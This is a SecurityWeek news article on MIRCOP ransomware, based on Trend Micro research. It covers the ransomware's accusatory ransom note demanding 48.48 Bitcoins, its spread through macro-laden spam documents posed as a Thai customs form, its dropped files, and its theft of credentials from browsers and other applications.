Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Malware & Threats

MIRCOP Ransomware Claims to be Victim, Demands Payback

Ransomware authors use various techniques to encourage victims to pay a ransom, and the actors behind a new threat called MIRCOP are employing an unusual one: the ransom note claims that the victim stole 48.48 Bitcoins. 

Ransomware authors use various techniques to encourage victims to pay a ransom, and the actors behind a new threat called MIRCOP are employing an unusual one: the ransom note claims that the victim stole 48.48 Bitcoins. 

What’s more, the ransom note displays a hooded figure in a Guy Fawkes mask, which has been long associated with notorious hacktivist group Anonymous, and offers little instruction on how the victim should pay the ransom. Instead, it suggests that the victim knows how to return the money and that they know who to send the ransom demand to.

At 48.48 Bitcoins, the ransom amounts to around $30,000, one of highest seen, but the ransom note threatens that further action will be taken if the victim doesn’t pay, researchers at Trend Micro reveal. The ransom note, however, does mention a Bitcoin address, although it doesn’t offer details on how victims can make crypto-currency transactions. However, no payment has been made to the mentioned address as of now.

The MIRCOP ransomware is distributed as a malicious document in spam emails, supposedly representing a Thai customs form used when importing or exporting goods. The document requests users to enable macros to be able to sign it, but instead abuses Windows PowerShell to download and execute the malicious payload.

MIRCOP drops three files in the %Temp% folder: c.exe (a routine that steals information), and x.exe and y.exe (both used to encrypt files). The new threat doesn’t append encrypted files with an extension, as other ransomware families out there do, but prepends files with the string “Lock.” And also encrypts common folders.

In addition to encrypting files on the infected machine, MIRCOP can steal credentials from various applications, including Mozilla Firefox, Google Chrome, Opera, FileZilla, and Skype, researchers discovered. In this regard, MIRCOP is not the first ransomware to pack info-stealing capabilities, given that CryptXXX has had the feature for over two months now.

“Social engineering in the form of spam can lead to infection, especially when the malware employs underhanded tactics such as macro malware leveraging on PowerShell in attached files. Users should be careful when receiving mail from unknown sources and should refrain from downloading and opening their attachments if any,” Trend Micro researchers note.

Since the beginning of this year, ransomware has emerged as a prevalent threat, and a recent report from Kaspersky revealed that the number of users attacked with cryptoware increased 5.5 times over the past couple of years. At the moment, Locky appears to be the top ransomware out there, courtesy of massive infection campaigns powered by the Necurs botnet.

Advertisement. Scroll to continue reading.

Related: Bart Ransomware Doesn’t Require C&C Server to Encrypt Files

Written By

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.

Register

Expert Insights

Related Content

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Malware & Threats

The NSA and FBI warn that a Chinese state-sponsored APT called BlackTech is hacking into network edge devices and using firmware implants to silently...

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...

Cyberwarfare

An engineer recruited by intelligence services reportedly used a water pump to deliver Stuxnet, which reportedly cost $1-2 billion to develop.

Malware & Threats

Unpatched and unprotected VMware ESXi servers worldwide have been targeted in a ransomware attack exploiting a vulnerability patched in 2021.

Malware & Threats

Apple’s cat-and-mouse struggles with zero-day exploits on its flagship iOS platform is showing no signs of slowing down.

Cybercrime

No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.